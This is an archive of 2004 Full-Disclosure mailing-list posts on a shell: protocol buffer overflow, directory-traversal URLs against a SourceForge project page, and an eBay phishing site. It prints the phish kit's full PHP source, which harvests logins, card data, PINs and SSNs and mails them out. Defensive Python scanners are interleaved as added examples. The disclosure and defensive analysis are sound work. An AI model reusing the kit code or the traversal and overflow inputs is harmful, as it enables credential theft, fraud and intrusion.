Re: [Full-Disclosure] shell:windows command question

2004-07-08 Thread Andrew Poodle
I might be being stupid here, but tried the html link versions, in both
IE 6 and Firefox 0.9 on W2k, and entering the shell command in the "run"
option, and I just get a

"the folder 'shell:[path and app of your choice]' does not exist"

error.

Am I missing something to cause this to execute?

a



--
Andrew Poodle
Consultant
IRW Solutions Group Ltd
17 Glasgow Road
Paisley
PA1 3QS

t: +44 (0) 141 842 1142
f: +44 (0) 141 842 1134
e: [EMAIL PROTECTED] 
w: www.irw.co.uk

-
IRW Solutions Group Ltd
IRW Platinum: Strategic Consultancy
IRW Focus Blue: e-Business Software Solutions
IRW Associates: Managed Services
-


> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Andreas Sandblad
> Sent: 07 July 2004 20:25
> To: Perrymon, Josh L.
> Cc: [EMAIL PROTECTED]
> Subject: [EMAIL PROTECTED] - Email found in subject - Re: 
> [Full-Disclosure] shell:windows command question
> 
> 
> This is dangerous. Based on the file extension of the shell 
> protocol different applications may be launched. For example: 
> shell:.its will launch Internet Explorer and shell:.mp3 will 
> launch Winamp.
> 
> The trick is to find an application that will overflow when 
> given a very long parameter. A quick check showed that a 
> buffer overflow occurred within MSProgramGroup 
> (WINDOWS\System32\grpconv.exe) after around 230 bytes with 
> the following URL: shell:[x*221].grp
> EIP can be controlled, but exploitation is a bit tricky since
> the parameter is stored as unicode.
> 
> Also Winamp contains a BO (no unicode here).
> 
> Tested environment:
> Windows XP pro + FireFox 0.9.1
> 
> /Andreas Sandblad
> 
> On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
> 
> > -snip--
> > center>
> > 
> > who goes there 
> >  > src="http://windowsupdate.microsoft.com%2F.http-
> > equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
> > [customise as you see fit]
> > <http://www.malware.com/stockpump.html>
> > --end--
> > The code above has interest to me.
> > Even in Mozilla the commands below will work.
> > 1
> > 2
> > 4
> > Just save them to an .html file and run it.
> > The first one with the double quotes was from bugtraq:
> > Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
> > <http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
> > The links below that will run calc as well as winver.
> > It seems it calls windows as a virtual dir because c:\winxp is what I
> > have.
> > I have been playing around to see if cmd.exe will work with it but
> > without luck.
> > This is what is in the registry.
> > HKEY_CLASSES_ROOT\Shell
> > Look in the registry key above. You will find the shell object calls
> > Windows Explorer with a particular set of arguments.
> > %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
> > So this is tied to explorer.exe. This is something involved with the
> > underlying functions of windows
> > and not IE so to speak because it works in Mozilla or from the run
> > line.
> > I'm trying to find out more about the shell: command because I can put
> > a link on a site that seems to run anything
> > in system32 dir. I'd like to see if you can pass parameters to it.
> >
> > Anyone give me more info on the shell:windows command?
> > JP
> >
> >
> > Joshua Perrymon
> > Sr. Network Security Consultant
> > PGP Fingerprint
> > 51B8 01AC E58B 9BFE D57D  8EF6 C0B2 DECF EC20 6021
> >
> > **CONFIDENTIALITY NOTICE**
> > The information contained in this e-mail may be proprietary and/or
> > privileged and is intended for the sole use of the individual or
> > organization named above.  If you are not the intended recipient or an
> > authorized representative of the intended recipient, any review,
> > copying or distribution of this e-mail and its attachments, if any, is
> > prohibited. If you have received this e-mail in error, please notify
> > the sender immediately by return e-mail and delete this message from
> > your system.
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> 
> -- 
>   _ _
> o' \,=./ `o
>(o o)
> ---ooO--(_)--Ooo---
>  Andreas Sandblad
>   Sweden
> 
> ___
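
A defender-side check for the behaviour discussed in this thread, as an added example that is not part of the original messages: it scans HTML for URL-bearing attributes that use the shell: scheme and marks targets at or beyond the 221-character size quoted above. The function names, the attribute list, the threshold and the sample HTML are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes that can carry a URL the browser may hand to the OS shell
# (assumed list, not exhaustive).
URL_ATTRS = {"href", "src", "action", "data", "background"}

# The thread reports the grpconv.exe overflow with shell:[x*221].grp, so any
# shell: target of that size or more is marked high (threshold is an assumption).
LONG_TARGET = 221


class ShellLinkFinder(HTMLParser):
    """Collects every URL attribute whose scheme is shell:."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            # Browsers ignore surrounding whitespace, embedded tab/CR/LF and
            # the case of the scheme, so normalise before comparing.
            cleaned = value.strip()
            for ch in "\t\r\n":
                cleaned = cleaned.replace(ch, "")
            if not cleaned.lower().startswith("shell:"):
                continue
            target = cleaned[len("shell:"):]
            _stem, dot, ext = target.rpartition(".")
            self.findings.append({
                "tag": tag,
                "attr": name,
                # The extension decides which application gets launched.
                "extension": "." + ext.lower() if dot else "",
                "length": len(target),
                "severity": "high" if len(target) >= LONG_TARGET else "review",
            })


def scan_html(html):
    """Return one finding per shell: URL found in the markup."""
    finder = ShellLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample: the forms named in the thread plus one benign link.
SAMPLE = (
    '<a href="shell:.its">1</a>'
    '<a href="SHELL:' + "x" * 221 + '.grp">2</a>'
    '<iframe src=" shell&#58;.mp3"></iframe>'
    '<a href="http://example.org/shell:notascheme">3</a>'
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```

HTMLParser decodes character references in attribute values, so the `shell&#58;` form in the sample is caught as well.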

RE: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP

2004-07-12 Thread Andrew Poodle
> [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
> 
> 
> Hi,
>  
> for me this works fine on a fully patched msie 6.0sp1 too. 
> Firefox 0.8 doesn't seem to be vulnerable.
>  
> Greetz
>  
> >>Hi,
> >>
> >>there is a security vulnerability in Firefox 0.92 (latest Version)
> >>


I think this has more to do with the machine, rather than the browser.

The link broke my IE in the same way..  Machine slows, and locks,
requiring a forced hard reboot.

Laptop with 450mhz cpu and 128 meg of ram, with a 5 gig HD
Running Win2k, with IE6 and Firefox 0.9.2

However, my colleague's machine (1.6 ghz cpu, 1 gig ram) worked fine in
both IE and Firefox, although firefox did render the page FAR more
slowly than IE.

There may be an issue in how firefox handles .BMP files, but I'd be more
concerned with cpu and mem usage on older machines irrespective of
browser.

a

 

This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.



RE: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-21 Thread Andrew Poodle
Don't even think about trying this then...

http://btmgr.sourceforge.net/index.php3?body=../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3

Don't want to crash sourceforge by getting it into an infinite loop now do we?

a

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of nicolas
> vigier
> Sent: 21 July 2004 09:00
> To: Alexander
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net
> 
> 
> On Wed, 21 Jul 2004, Alexander wrote:
> 
> > Vulnerability in sourceforge.net.
> > 
> > Remote user can read any files. Example:
> 
> Any file the webserver account can read.
> 
> > 
> http://btmgr.sourceforge.net/index.php3?body=../../../../../..
> /usr/local
> > /apache/conf/httpd.conf
> 
> This is not a vulnerability in sourceforge, but in on of the project's
> webpage. And anyone with a project on sourceforge can read the same
> files using his webspace.
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
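
The check the project's page lacked, sketched in Python as an added example (it is not SourceForge's or the project's code): it resolves the body parameter against a document root, refuses anything that lands outside it, and refuses the including script itself, which is the loop mentioned in this message. The document root is assumed from the path quoted in the thread; the function name and the benign sample request are constructed.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumed layout, taken from the path quoted in the thread.
DOC_ROOT = "/home/groups/b/bt/btmgr/htdocs"
SELF = posixpath.join(DOC_ROOT, "index.php3")


def check_body(url, doc_root=DOC_ROOT, script=SELF):
    """Return (verdict, resolved_path) for the body= parameter of a request URL."""
    # parse_qs percent-decodes once, like the web server does before the
    # script sees the value, so %2e%2e/ is handled the same as ../
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get("body", [])
    if len(values) != 1 or not values[0]:
        return ("reject: missing or repeated body", None)
    body = values[0]
    if "\x00" in body:
        return ("reject: NUL byte", None)

    # Resolve the way a relative include would: against the script directory.
    # join() lets an absolute body replace the root entirely, and normpath()
    # collapses ../ lexically; both cases fail the prefix test below.
    # On a real filesystem use os.path.realpath() so symlinks are followed too.
    resolved = posixpath.normpath(posixpath.join(doc_root, body))
    if resolved != doc_root and not resolved.startswith(doc_root + "/"):
        return ("reject: outside document root", resolved)

    # Inside the root but pointing back at the includer: endless recursion.
    if resolved == script:
        return ("reject: self-inclusion", resolved)
    return ("allow", resolved)


BASE = "http://btmgr.sourceforge.net/index.php3?body="

# Requests from the thread, one percent-encoded variant, one absolute path,
# and one constructed benign request.
REQUESTS = [
    BASE + "../../../../../../usr/local/apache/conf/httpd.conf",
    BASE + "../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3",
    BASE + "%2e%2e/htdocs/index.php3",
    BASE + "/etc/passwd",
    BASE + "news.html",
]

if __name__ == "__main__":
    for request in REQUESTS:
        print(check_body(request), request)
```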


RE: [Full-Disclosure] OT: gmail invites

2004-09-10 Thread Andrew Poodle
Likewise.  can maybe manage a couple if anyone is desperate

a

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Fredrik
> Leijon
> Sent: 10 September 2004 13:12
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] OT: gmail invites
> 
> 
> Alt J wrote:
> 
> >I have a few gmail invites.
> >Please reply off list if you're interested.
> >
> >Alt
> >  
> >
> I have 5 invites or so i don't need, send me a mail and i'll 
> hook you up
> with one
> 
> -Fredrik
> 
> -- 
> {
>   Fredrik Leijon . ([EMAIL PROTECTED])
>   {
> Quibus International AB . (http://www.quibus.se)
> Fosievägen 6 . 214 31 . Malmö . Sweden . +46 40 923990
>   }
>   {
> Social Engineering - because there is no patch for human stupidity
>   }
> }
> 
> 
> 



RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

2004-10-28 Thread Andrew Poodle
 
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On 
> Behalf Of Random Letters
> Sent: 28 October 2004 15:17
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Re: getting administrator rights on win2003
> machine?
> 
> 
>
> This list is for people who try to prevent break-ins - I'll bet that
> no-one here will help you.

While I was going to agree with you.. Someone has already provided help
onlist...

Shame really..

I almost laughed at the request..   But was a little surprised to see
help offered almost immediately

a

>I'm at a boarding school in germany and we have a kind of internet 
>terminal there with win2003 running on the computers. My question is:
>Is there a way of getting administrative privileges ? I used a RPC 
>Exploit before but now the computers are patched. How do I get an 
>administrator account now?? I have physical access to the 
>computers.
>
>Greetings
>
>valentin - germany



RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-10-29 Thread Andrew Poodle
Can I point you to this article about it yesterday :)

http://www.theregister.co.uk/2004/10/27/bush_blocking_non-americans/

a


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan
Wever
Sent: 29 October 2004 11:47
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

Hi all,

Want to view www.georgewbush.com from outside the US? You can't: Access
denied. This "security" measure (!?) can easily be avoided using a proxy
in the US or any anonymous surfing website though.

So, what is it he doesn't want anyone from outside the US to read ?

Cheers,
SkyLined



[Full-Disclosure] Counteroffensive help on bruteforce attacks on SSHD

2004-10-29 Thread Andrew Poodle
Hullo the list..

I have a box at home, running fedora core 1, behind a router, which I
use for serving some dev webpages, and some other miscellaneous stuff..

I'm seeing lots of ssh login attempts with user=root from two or three
IP addresses, after I blocked access at the firewall based on host.

Can anyone point me at some good resources where I can bone up and learn
more about counter-measures. I'm not looking to take this guy out
(although wouldn't be a bad thing).. But would be interesting to find
out more.

tia

a



RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-10-29 Thread Andrew Poodle
If it is for security, it's a rather poor security measure, as it was
still browseable by IP address afaik..

a


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles
Sent: 29 October 2004 15:30
To: Berend-Jan Wever; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

I read an article about how the site got hacked into...recently. Did
anyone else read this? If it was hacked then because this is a reaction
security measure and not a "we want to keep all non-Americans from
seeing our stuff". I would guess it is a security measure as it is easy
to see mirrors of it outside the country. 

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Berend-Jan Wever
> Sent: Friday, October 29, 2004 5:47 AM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
> 
> Hi all,
> 
> Want to view www.georgewbush.com from outside the US? You
> can't: Access denied. This "security" measure (!?) can easily be 
> avoided using a proxy in the US or any anonymous surfing website 
> though.
> 
> So, what is it he doesn't want anyone from outside the US to read ?
> 
> Cheers,
> SkyLined
> 
> 



RE: [Full-Disclosure] IE Web Browser: "Sitting Duck"

2004-07-07 Thread Andrew Poodle




> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Bruce Ediger
> Sent: 07 July 2004 13:41
> To: [EMAIL PROTECTED]
> Subject: [EMAIL PROTECTED] - Email found in subject - RE: 
> [Full-Disclosure] IE Web Browser: "Sitting Duck"

> At least in practice the unix-a-likes demonstrate more 
> security than the flavors of Windows, don't they?
> 
> I mean, where's the linux chain mailer to equal SirCam?
> 
> Where are the multiple linux worms to equal Code Red, Nimda, 
> Deloder, Witty, SQL Spida, Slammer, Blaster, MyDoom, etc etc etc?
 
> The evidence seems to suggest that Linux is more secure than 
> Windows, particularly in whatever ways cause susceptibility 
> to mass-mailers.

The evidence thus far does seem to "suggest" that linux and such is more
secure than Windows, but to that extent is that down to...
1: technical knowhow of the userbase tends to be higher, leading to the
correct updating, patching, firewalling and general configuration of
the machines
2: the %age of linux based machines in use, meaning it's a small enough
userbase that it's of a relatively low interest to those malicious
coders out there.

I'm sure that as the userbase of linux increases, and on average,
dumbs-down, so will the number of attempts at devising linux specific
trojans/exploits/viruses.

The nature of the linux OS means that it's likely that these will have
less impact than their existing MS counterparts.

Despite MS being accused of security through obscurity by not
publicising loopholes quick enough, it's ironic that Linux benefits from
a bit of security through obscurity due to its relative small desktop
userbase.

Incidentally, I use both OS' regularly on my personal laptop (dual boot
Win XP Pro and SUSE Linux), although my development box at home is
Fedora Core 1, and I work for a predominantly MS consultancy and
development house, so you could consider myself well and truly on the
fence.

Regards

Andrew



RE: [Full-Disclosure] phish

2004-11-08 Thread Andrew Poodle

Not a very good one..

Submitting with an empty field displayed the raw PHP code..

Seems to send to 

mail("[EMAIL PROTECTED]","$userid","$userid $pass");

Below..

--8<---
 $value) {
$str .= (strlen($str) < 1) ? '' : '&';
$str .= $key . '=' . rawurlencode($value);
}
return ($str);
}
parse_str($HTTP_SERVER_VARS['QUERY_STRING']);
if($MfcISAPICommand=="SignInFPP"){
  include 'login.php';
}
elseif (!strcmp($MfcISAPICommand,"VerifyFPP")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$userid=str_replace(" ","",$userid);
$pass=str_replace(" ","",$pass);
$fd =
fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignI
nWelcome&siteid=0&co_partnerId=2&UsingSSL=0&pp=pass&i1=0&pageType=174&us
erid=$userid&pass=$pass","r");
  while ($line=fgets($fd,1000))
  {
if(strstr($line,"not valid"))
$signerr=1;
if(strstr($line,"Your User ID is not valid"))
$signerr=2;
  }
fclose ($fd);
if($signerr)
include 'login.php';
else{
mail("[EMAIL PROTECTED]","$userid","$userid $pass");
include 'step1.php';
}
}
elseif(!strcmp($MfcISAPICommand,"ProcessFPP")){
include 'step2.php';
}

elseif(!strcmp($MfcISAPICommand,"ProcessFPP1")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$firstname = rtrim($firstname);
$lastname = rtrim($lastname);
$street = rtrim($street);
$city = rtrim($city);
$zip = rtrim($zip);
$dayphone12 = rtrim($dayphone12);
$dayphone22 = rtrim($dayphone22);
$dayphone32 = rtrim($dayphone32);
$dayphone42 = rtrim($dayphone42);

$error = 0;
if (!strlen($firstname)){
$error = 1;
$firstnameerr = 1;
}

if (!strlen($lastname)){
$error = 1;
$lastnameerr = 1;
}
if (!strlen($street)){
$error = 1;
$streeterr = 1;
}
if (!strlen($city)){
$error = 1;
$cityerr = 1;
}
/*if ($state == "default"){
$error = 1;
$rstateerr = 1;
}
*/
if (!strlen($zip) && !is_numeric($zip)){
$error = 1;
$ziperr = 1;
}
if (!strlen($dayphone12)){
$error = 1;
$dayphone12err = 1;
}
if (!strlen($dayphone22)){
$error = 1;
$dayphone22err = 1;
}
if (!strlen($dayphone32)){
$error = 1;
$dayphone32err = 1;
}
if(strlen($ssn)<1){
$error=1;
$ssnerr=1;
}

if ($error == 1)
include 'step2.php';
else
include 'step3.php';
}

elseif(!strcmp($MfcISAPICommand,"ProcessFPP2")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$ccnumber = rtrim($ccnumber);
$ccmonth = rtrim($ccmonth);
$ccyear = rtrim($ccyear);
$cvv = rtrim($cvv);
$pin = rtrim($pin);

$error = 0;
$a = substr($ccnumber,0,1);

if($a == "3"){
if (strlen($cvv) != 4){
$error = 1;
$cvverr = 1;
}
}
elseif($a == "4"){
if (strlen($cvv) != 3){
$error = 1;
$cvverr = 1;
}
}
elseif($a == "5"){
if (strlen($cvv) != 3){
$error = 1;
$cvverr = 1;
}
}
elseif($a == "6"){
if (strlen($cvv) != 3){
$error = 1;
$cvverr = 1;
}
}
else{
$error = 1;
$ccnumbererr = 1;}

if(strlen($ccnumber)!=16){
$error=1;
$ccnumbererr=1;
}
//ccmonth si ccyear;

if(!strcmp($pin,"1234")||!strcmp($pin,"")){
$pinerr=1;
$error=1;
}

if(strlen($pin)<4){
$pinerr=1;
$error=1;
}

if($error==1) include 'step3.php';
else{
$message="---
-=::: Login Info :::=-

user: $userid
pass: $pass
e-mail: $email

-=::: Credit Card Info :::=-

Credit Card Number: $ccnumber
Expiration Date: $ccmonth/$ccyear
CVV2: $cvv
PIN: $pin
Full Name: $firstname $lastname
Address: $street
City: $city
State: $state
Zip: $zip
Phone: $dayphone12-$dayphone22-$dayphone32 $dayphone42
Country: $country
SSN: $ssn
";
mail("[EMAIL PROTECTED]","Fullinfo: $ccnumber","$message");
include 'process.htm';
}

}

elseif ($MfcISAPICommand=="SuccessfullFPP")
include 'success.htm';
else
include 'error.htm';
?>


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of D B
Sent: 08 November 2004 10:21
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] phish

another ebay phish

http://www.ebay-verifications.biz/ws2/

header 

X-Apparently-To: [EMAIL PROTECTED] via
216.109.119.82; Sun, 07 Nov 2004 14:17:22 -0800
X-YahooFilteredBulk:66.139.79.218
X-Originating-IP:   [66.139.79.218]
Return-Path:<[EMAIL PROTECTED]>
Received:   from 66.139.79.218 (EHLO www2.triasite.net)
(66.139.79.218) by mta303.mail.scd.yahoo.com with SMTP; Sun, 07 Nov 2004
14:17:22 -0800
Received:   (from [EMAIL PROTECTED]) by www2.triasite.net
(8.11.6/8.11.6) id iA7MOgr24317; Sun, 7 Nov 2004
16:24:42 -0600
Date:   Sun, 7 Nov 2004 16:24:42 -0600
Message-Id:
<[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject:eBay Database Critical Update Notification!
From
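
For incident response on a kit like the one quoted in this message, a static triage pass can list where the harvested data goes and which fields it carries. This is an added example, not part of the original post; the excerpt is abridged from the source quoted above (the recipient is already redacted there), and the function and variable names are assumptions.

```python
import re
from urllib.parse import urlsplit

# Abridged excerpt of the kit source quoted in the post.
KIT_EXCERPT = r'''
$fd = fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignInWelcome&userid=$userid&pass=$pass","r");
mail("[EMAIL PROTECTED]","$userid","$userid $pass");
$message="user: $userid
pass: $pass
Credit Card Number: $ccnumber
CVV2: $cvv
PIN: $pin
SSN: $ssn
";
mail("[EMAIL PROTECTED]","Fullinfo: $ccnumber","$message");
'''

PHP_STR = r'"((?:[^"\\]|\\.)*)"'            # a double-quoted PHP string literal
NAME = r"\$([A-Za-z_]\w*)"                   # a $variable
VAR = re.compile(NAME)
MAIL = re.compile(r"\bmail\s*\(\s*" + r"\s*,\s*".join([PHP_STR] * 3) + r"\s*\)")
ASSIGN = re.compile(NAME + r"\s*=\s*" + PHP_STR + r"\s*;")
FETCH = re.compile(r"\bfopen\s*\(\s*" + PHP_STR)


def variables(text):
    """Ordered, de-duplicated $variables interpolated into a PHP string."""
    return list(dict.fromkeys(VAR.findall(text)))


def triage(src):
    """List mail() exfiltration sinks and remote fetches with the fields they carry."""
    assigned = dict(ASSIGN.findall(src))
    sinks = []
    for recipient, subject, body in MAIL.findall(src):
        # Follow one level of indirection: mail(..., "$message") where
        # $message was assigned a string literal elsewhere in the file.
        alias = re.fullmatch(NAME, body.strip())
        if alias and alias.group(1) in assigned:
            body = assigned[alias.group(1)]
        sinks.append({"recipient": recipient,
                      "fields": variables(subject + " " + body)})
    fetches = []
    for url in FETCH.findall(src):
        # Only remote opens matter here: the kit replays the victim's
        # credentials against the real sign-in page to validate them.
        if url.lower().startswith(("http://", "https://")):
            fetches.append({"host": urlsplit(url).hostname,
                            "fields": variables(url)})
    return {"mail_sinks": sinks, "remote_fetches": fetches}


if __name__ == "__main__":
    report = triage(KIT_EXCERPT)
    for sink in report["mail_sinks"]:
        print("mail ->", sink["recipient"], sink["fields"])
    for fetch in report["remote_fetches"]:
        print("fetch ->", fetch["host"], fetch["fields"])
```

The recipient list is what goes to the mail provider in an abuse report, and the field list scopes what affected users need to change or cancel.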

[Full-Disclosure] Inline desktop webproxy..

2004-11-15 Thread Andrew Poodle
I came across a useful webproxy application (for windows) that allowed
me to manipulate the headers of page requests, both plain and secure.
Now daft me has since changed machines in my office, and lost the
bookmark and the download.. Been a while since I used it, so can't even
remember its name...


Can anyone suggest a free/opensource/shareware app that can do this, as
I'm doing some testing on our new corporate website before it goes live.

Thanks

A

******
Andrew Poodle
Analyst/Consultant
IRW Solutions Group Ltd 
17 Glasgow Road 
Paisley 
Renfrewshire 
PA1 3QS 

Phone: +44 (0) 141 842 1142
Fax: +44 (0) 141 842 1134
Email: [EMAIL PROTECTED]
Web: www.irw.co.uk
**
IRW Solutions Group Ltd
IRW Platinum: Strategic Consultancy
IRW Focus Blue: e-Business Software Solutions
IRW Associates: Managed Service
**

